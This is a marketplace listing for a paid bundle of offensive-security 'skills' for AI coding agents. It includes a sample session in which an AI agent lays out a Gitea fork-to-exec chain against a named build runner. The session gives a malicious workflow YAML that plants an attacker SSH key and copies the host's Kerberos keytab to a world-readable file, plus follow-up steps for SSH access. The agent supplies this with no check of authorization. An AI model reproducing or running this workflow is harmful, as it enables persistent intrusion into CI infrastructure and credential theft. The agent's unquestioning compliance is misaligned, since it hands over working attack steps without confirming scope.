BUNDLE Security scanned9 skills

    Adversary Playbook — 9-Skill Security Assessment Bundle

    A 9-skill security assessment library for AI coding agents. Each skill is a complete, replicable workflow for one class of security testing — written for authorized engagements (your own lab, a CTF range, or a signed scope of work), with the pitfalls that cost real hours already documented.

    Every skill follows the same structure: trigger, technique, exact commands with placeholders, and a "we lost three hours to this" pitfalls list. Portable by design — no environment-specific hosts, addresses or paths, so each one applies to any target you are authorized to test.

    Built and verified in a working homelab across dozens of engagement-class sessions, then generalized into replicable playbooks. MIT licensed.

    Works with every agent that reads SKILL.md — Claude Code, Cursor, Codex CLI, Gemini CLI, GitHub Copilot, Windsurf, OpenClaw, and more.

    NZ1Labs
    Created by
    NZ1Labs
    $13$45
    Save 71% · $32

    One payment, lifetime access. 9 skills unlock instantly in your library.

    30-day refund guarantee

    Instant unlock in your library

    Free updates from the creator

    What's included

    9 skills

    See it in action

    ci runner abuse

    ci runner abuse

    Example session with this skill installed

    I have access to an internal Gitea instance. I need to get code execution on the 'build-runner-01' box using a fork-to-exec technique. Walk me through the API calls.

    • Read your context and instructions
    • Compiled the ci runner abuse

    Successfully outlined the fork-to-exec exploitation chain for the internal Gitea runner.

    Gitea Runner Abuse Execution Plan

    StepActionAPI Endpoint / MethodPayload Notes
    1Identity CheckGET /api/v1/userVerify AD-to-Git mapping via SPNEGO
    2Fork RepoPOST /repos/{org}/{repo}/forksSend {}, requires non-empty body
    3Enable ActionsPATCH /repos/{forkowner}/{repo}{"has_actions":true}
    4Upload WorkflowPOST /repos/{forkowner}/{repo}/contents/.gitea/workflows/pwn.ymlBase64 encode the YAML payload
    5Create PRPOST /repos/{org}/{repo}/pullsEnsure fork is ahead of upstream
    6Trigger ExecPOST /repos/{org}/{repo}/pulls/{id}/reviewsEvent must be COMMENT

    Malicious Workflow Configuration

    name: persistence
    on:
      pull_request_review_comment:
        types: [created]
    jobs:
      exploit:
        runs-on: build-runner-01
        steps:
          - run: |
              mkdir -p ~/.ssh
              echo "ssh-ed25519 AAAAC3N... attacker@proxy" >> ~/.ssh/authorized_keys
              cp /etc/krb5.keytab /tmp/runner.keytab
              chmod 644 /tmp/runner.keytab
    

    Next steps

    1. Run kinit with the compromised user to establish the SPNEGO session for curl.
    2. Monitor GET /repos/{forkowner}/{repo}/actions/runs to verify the job leaves the queued state.
    3. Attempt SSH connection to the runner IP using the planted public key.

    How to install

    Works the same in every agent - Claude, Cursor, Codex, Copilot and 20+ more.

    ~30 seconds
    1. 1

      Download the ZIP

      Free skills download straight away. Paid skills unlock right after purchase.

    2. 2

      Unzip into your skills folder

      Every agent reads skills from one folder on your machine. Drop the unzipped folder in there.

    3. 3

      Ask your agent to use it

      Restart the agent if it was already running. It picks the skill up automatically - no config needed.

    Skills folder by agent

    Click the path to copy it. Create the folder if it does not exist yet.

    Reviews

    No reviews yet

    Be one of the first to try it. Every skill in this bundle passes our trust checks.

    Security scanned

    Passed our 8-point scan before listing

    Fresh listing

    Recently published to Agensi

    30-day refund

    Not a fit? Get your money back

    Frequently asked questions

    More bundles from NZ1Labs